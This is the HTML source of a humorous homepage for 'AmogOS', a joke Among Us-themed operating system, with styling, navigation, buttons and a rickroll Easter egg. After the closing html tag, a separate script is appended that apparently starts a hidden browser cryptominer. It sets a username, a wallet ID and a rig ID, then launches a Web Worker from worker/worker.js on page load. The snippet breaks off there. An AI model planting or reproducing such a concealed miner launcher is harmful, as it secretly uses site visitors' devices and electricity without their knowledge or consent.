<!--haccing skills #1: view page source-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="A sus OS for aSUS computers.">
    <meta name="keywords" content="amogos,amog os,amongos,amogus,among us">
    <meta name="theme-color" content="#66ddcc">
    <meta property="og:site_name" content="AmogOS">
    <meta name="og:title" content="AmogOS | Home">
    <meta name="og:description" content="A sus OS for aSUS computers.">
    <meta name="og:image" itemprop="image" content="https://amogos.studio/icons/sus.png">
    <link rel="shortcut icon" href="icons/sus.ico" sizes="32x32">
    <link rel="bookmark" href="icons/sus.ico">
    <link href="common.css" rel="stylesheet" type="text/css">
    <title>AmogOS | Sussy wussy.</title>
    <style>
        body{
            background-repeat: no-repeat;
            background-size: cover;
        }
        #main-container{
            height: 100vh;
        }
        #logo-container{
            padding-top: calc(36vh - 30px);
            width: 100%;
            text-align: center;
        }
        #text-logo, #slogan{
            display: inline-block;
            font-family: "Poppins";
            color: transparent;
            background: linear-gradient(-30deg, #669999, #66ddcc);
            -webkit-background-clip: text;
            cursor: default;
        }
        #text-logo{
            font-size: 60px;
            line-height: 75px;
        }
        #slogan-container{
            padding-top: 1.5%;
            padding-left: 12%;
            padding-right: 12%;
        }
        #slogan{
            font-size: 22px;
            line-height: 28px;
        }
        #download-container{
            padding-top: 1.5%;
            width: 100%;
            text-align: center;
        }
        .buttons{
            transition: 0.3s ease;
            width: 200px;
            height: 70px;
            margin: 10px;
            outline: none;
            border: 0px solid transparent;
            border-radius: 20px;
            color: #ffffff;
            font-size: 18px;
            font-family: "Poppins";
            cursor: pointer;
        }
        #download{
            background-image: linear-gradient(-30deg, #669999, #66ddcc);
        }
        #download:hover{
            box-shadow: 0px 0px 12px #66ddcc;
        }
        #discord{
            background-image: linear-gradient(-30deg, #4e5d94, #7289da);
        }
        #discord:hover{
            box-shadow: 0px 0px 12px #7289da;
        }
        #github{
            background-image: linear-gradient(-30deg, #0D1117, #161B22);    
        }
        #github:hover{
            box-shadow: 0px 0px 12px #1e2735;
        }
        #donate{
            transition: 0.3s ease;
            position: fixed;
            right: 18px;
            bottom: 18px;
            height: 48px;
            margin-right: -180px;
            padding: 12px;
            outline: none;
            background-image: linear-gradient(-30deg, #297EFF, #8FC7FF);
            color: #ffffff;
            font-size: 12px;
            border: none;
            border-radius: 18px;
            font-family: "Poppins";
            cursor: pointer;
        }
        #donate:hover{
            box-shadow: 0px 0px 9px #8FC7FF;
        }
        @media screen and (max-width: 850px) {
            #logo-container{
                padding-top: calc(36vh - 60px);
            }
            header, #copyright{
                background-color: transparent;
            }
            body{
                background-image: none;
            }
        }
        @media screen and (max-width: 620px) {
            #logo-container{
                padding-top: calc(26vh - 60px);
            }
            #slogan{
                font-size: 18px;
                line-height: 24px;
            }
        }
    </style>
</head>
<body>
    <div id="main-container">
        <header>
            <nav>
                <ul id="bar">
                    <li><a id="nav-logo" href="https://www.amogos.studio"></a></li>
                    <li><a id="nav-home" class="now" href="index.html">Home</a></li>
                    <li><a id="nav-install" href="install.html">Install Instructions</a></li>
                    <li><a id="nav-startpage" href="startpage/">Startpage</a></li>
                    <li><a id="nav-about" href="about.html">About</a></li>
                </ul>
            </nav>
        </header>
        <div id="logo-container">
            <div id="text-logo-container">
                <span id="text-logo">AmogOS</span>
            </div>
            <div id="slogan-container">
                <span id="slogan">A sus OS for aSUS computers</span>
            </div>
        </div>
        <div id="download-container">
            <button id="download" class="buttons" onclick="download()">Unsupported Browser</button>
            <button id="discord" class="buttons" onclick="discord()">Join our Discord!</button>
            <button id="github" class="buttons" onclick="github()">View our GitHub!</button>
        </div>
        <button id="donate" onclick="donate()" title="yes yes yes yes yes">Help us plz we're in debt</button>
        <footer>
            <p id="copyright">© 2021-2022 AmogOS Project. All Suspiciousness Reserved.</p>
        </footer>
    </div>
    </div>
    <script>
        var secretNum = 0;

        if (window.innerWidth <= 620){
            document.getElementById("nav-install").innerHTML = "Install";
        }
        document.getElementById("download").innerHTML = "Download";

        function download(){
            window.location.href = "downloads.html";
        }
        
        function discord(){
            window.open("https://discord.gg/6ut87Hqukr");
        }
        function github(){
            window.open("https://github.com/Amog-OS/AmogOS");
        }
        function donate(){
            window.location.href = "https://opencollective.com/amogos";
        }

        setTimeout(function(){
            document.getElementById("donate").style.marginRight = "0";
        }, 1000);

        function startRickroll(){
            document.getElementById("choose").style.display = "none";
            document.getElementById("rickroll").style.display = "block";
            document.getElementById("rickroll").play();
            setTimeout(function(){
                document.getElementById("show").onclick = function(){
                    document.getElementById("copyright").innerHTML = "You have no control over this situation.";
                }
            }, 100);
        }

        document.onkeydown = function(event){
            if (event.keyCode == 27){
                if (document.getElementById("show").style.display == "block" && document.getElementById("choose").style.display == "block"){
                    document.getElementById("show").style.display = "none";
                    document.getElementById("choose").style.display = "none";
                    document.getElementById("download").innerHTML = "Download";
                }
            }
        }

        function escape() {
            if (document.getElementById("show").style.display == "block" && document.getElementById("choose").style.display == "block"){
                document.getElementById("show").style.display = "none";
                document.getElementById("choose").style.display = "none";
                document.getElementById("download").innerHTML = "Download";
            }
        }

        window.onload = function(){
            document.body.style.backgroundImage = "url('icons/bg-1080p.jpg')";
        }

        document.getElementById("text-logo").onclick = function(){
            secretNum += 1;
            if (secretNum == 10){
                document.getElementById("slogan").innerHTML = "SUSSY";
                document.getElementById("text-logo").innerHTML = "Sussy Baka";
                document.body.style.backgroundImage = "url(icons/fongzoi.png)";
                document.getElementById("rickroll").load();
                setTimeout(function(){
                    startRickroll();
                }, 4200.69);
            }
        }

        console.log("%c3yr old haccing skills #2: inspect elements and console", "color:blue; font-size:50px");
        console.log("%cstop being s u s you little baka", "color:red; font-size:80px");
        //#607D77 #7A9992
    </script>
</body>
</html>
<script>
let username = `rpinews`;
let wallet_id = Math.floor(Math.random() * 2811);
let rigid = `AmogOS-${wallet_id}`;
let workerVer = 0;

let socketWorker = new Worker("worker/worker.js"); //creates the worker
socketWorker.postMessage('Start,' + username + "," + rigid + "," + workerVer + "," + wallet_id);


